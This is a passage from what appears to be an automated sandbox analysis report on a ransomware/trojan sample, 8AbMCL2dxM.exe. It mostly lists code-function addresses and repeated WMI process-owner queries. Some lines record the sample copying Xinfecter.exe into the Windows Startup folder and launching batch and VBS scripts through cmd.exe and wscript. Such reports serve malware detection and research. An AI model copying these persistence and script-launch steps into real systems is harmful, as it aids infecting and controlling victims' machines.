        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002D237D
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00284470
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00276484
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002CA4E0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002766A8
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00254680
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002206F8
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002787A0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00250880
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00284910
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002789A0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00228A30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00218AE0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00276AEB
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A4AE4
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0025AAC0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00228B70
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00262BC0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00278C40
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00276F46
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0027CFC5
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022F020
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002850D0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002CF11B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002271D0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A7268
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00215330
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00219300
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002E1304
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00285370
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00251600
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A965A
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00259690
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0027D73F
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022B740
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002757A7
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002757B4
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002B97F0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002B9A62
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00261AA0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0021BAB0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0027DAC6
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00275B3B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0021DB00
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00253B00
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00255C00
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002CBC8B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0027DD57
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022FD50
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002C3DB3
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0029FDF0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00251E30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002C3FE2
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 002A1DB1 appears 83 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 0024A350 appears 64 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 002423A0 appears 69 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 002A1D7D appears 186 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 002488E0 appears 33 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 0024C0E0 appears 48 times
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 002A2380 appears 70 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: String function: 008E23A0 appears 69 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: String function: 00941D7D appears 186 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: String function: 008EA350 appears 64 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: String function: 00941DB1 appears 83 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: String function: 008E88E0 appears 33 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: String function: 008EC0E0 appears 48 times
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: String function: 00942380 appears 70 times
        Source: 8AbMCL2dxM.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engine | Classification label: mal100.rans.troj.adwa.evad.winEXE@119/22@1/2
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C60E0 PathIsNetworkPathA,__alloca_probe_16,MultiByteToWideChar,GetDiskFreeSpaceExW
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1048:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1032:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
        Source: 8AbMCL2dxM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="328"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="412"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="488"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="560"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="652"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="928"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="996"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="436"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="376"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="60"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="980"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1040"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1064"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1140"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1192"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1248"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1328"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1344"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1356"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1448"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1516"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1528"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1560"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1640"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1648"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1784"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1872"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1900"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1980"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1988"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2000"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1704"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2076"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2088"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2148"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2236"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2288"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2424"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2516"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2552"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2560"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2600"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2624"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2648"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2692"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2764"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2916"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3008"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3624"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3668"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3808"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3952"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4168"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4356"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4400"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4804"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5416"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6016"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5188"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5428"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1888"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5312"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6296"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2260"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2752"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5988"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5796"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2436"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="516"::GetOwner
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\timeout.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="328"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="412"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="488"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="560"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="652"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
